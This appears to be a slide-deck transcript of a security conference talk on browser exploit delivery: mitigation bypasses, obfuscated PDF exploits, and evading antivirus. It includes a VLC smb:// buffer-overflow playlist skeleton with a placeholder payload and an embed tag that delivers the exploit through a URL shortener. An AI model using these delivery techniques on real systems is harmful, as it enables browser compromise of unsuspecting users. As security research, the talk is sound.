Exploit Delivery

  • Talk about the BROWSER WARS. The race is on for the fastest JS interpreter. IE vs FF, Chrome vs Safari, Chrome offering an IE-plugin (Frankenchrome), IE calling the Chrome plugin insecure, Steve Jobs trashing Flash, Chrome making Flash an integral part of the browser, and the list goes on...
  • Slew of recent Java vulnerabilities. Latest one being the command exec vuln with JavaWebStart. Quicktime, VLC and other plugins keep getting exploited regularly. So do toolbars.
  • Flash Sprays
  • URL Shorteners, can host an entire exploit.
  • 800+ Javascript events, Video, and more
  • Sandboxing isn't the solution.
  • Exploit Delivery

    1. net-square Hi! Your exploits have arrived.
    2. # who am i • Saumil Shah, CEO Net-square • LinkedIn: saumilshah
    3. The Web Has Evolved: "The amount of intelligence in the world is constant. And the population is increasing."
    4. Browser Wars. Death of Standards. HTTP +0.1. HTML?
    5. THE WEB WE LIVE IN
    6. Wider Attack Surface
    7. Ease of Exploitation
    8. Mass Manufacturing
    9. Complexity...
    10. A New Dimension!
    11. Exploit Mitigation Techniques
    12. /GS, SafeSEH, DEP, ASLR, Permanent DEP, ASLR and DEP
    13. /GS, SafeSEH, DEP, ASLR, Permanent DEP, ASLR and DEP; SEH overwrites, non-SEH DLLs, Return to LibC, Heap Sprays, ROP, JIT Sprays
    14. I can haz sandbox. I Also Can!
    15. IM IN UR BASE KILLING UR D00DZ. Sploit Time!
    16. See no EVAL: CVE 2010-2883 (0+10) day exploit. Obfuscated Javascript decoded without using eval, document.write, etc.
    17. Who you gonna call?
    18. howstuffworks - Anti Virus: YER NOT ON THE LIST! COME ON IN.
    19. howstuffworks - Anti Virus: These are not the sploitz you're looking for.
    20. 0-day to the Face! "To get our new signature files you need a valid support plan."
    21. ...and keep on patching
    22. Jedi Web Tricks: Short.nr, Clever JS, Scripts without scripts, HTML5
    23. W3C: "I don't think it's ready for production yet," especially since W3C still will make some changes on APIs, said Le Hegaret. "The real problem is can we make HTML5 work across browsers and at the moment, that is not the case." [6th October 2010]
    24. We Broked Teh Webz! HTML: Standards... What Standards? Object access. JS too powerful. SRC=. HTTP: Old and idiotic. Stateless. No Auth. Bursty.
    25. Application Delivery - The Web at present: Authentication, Statefulness, Data Typing, Non-mutable. HTTP, HTML, AJAX, Flash, Sandbox, HTML5, Anti-XSS, WAF, Silverlight, Web sockets. MIND THE GAP
    26. Sploit Time!
    27. smb:// mrl buffer overflow
    28. VLC smb:// overflow - playlist
        <?xml version="1.0" encoding="UTF-8"?>
        <playlist version="1" xmlns="http://xspf.org/ns/0/" xmlns:vlc="http://www.videolan.org/vlc/playlist/ns/0/">
          <title>Playlist</title>
          <trackList>
            <track>
              <location>smb://example.com@0.0.0.0/foo/#{AAAAAAAA....}</location>
              <extension application="http://www.videolan.org/vlc/playlist/0">
                <vlc:id>0</vlc:id>
              </extension>
            </track>
          </trackList>
        </playlist>
    29.
    30. Alpha Encoded Exploit. Tiny URL. ZOMFG
    31. 100% Pure Alphanum!
    32. VLC smb overflow - HTMLized!! <embed type="application/x-vlc-plugin" width="320" height="200" target="http://tinyurl.com/ycctrzf" id="vlc" /> I'm in ur browser.... ...blowin up ur g00dz. pwn
    33. This iz what?
    34. I'm an evil Javascript. I'm an innocent image.
    35. <CANVAS>
    36. The Solution? HTML 8.0, HTTP 2.0, Browser Security Model, Self Contained Apps
    37. secure . automate . innovate www.net-square.com kthxbai
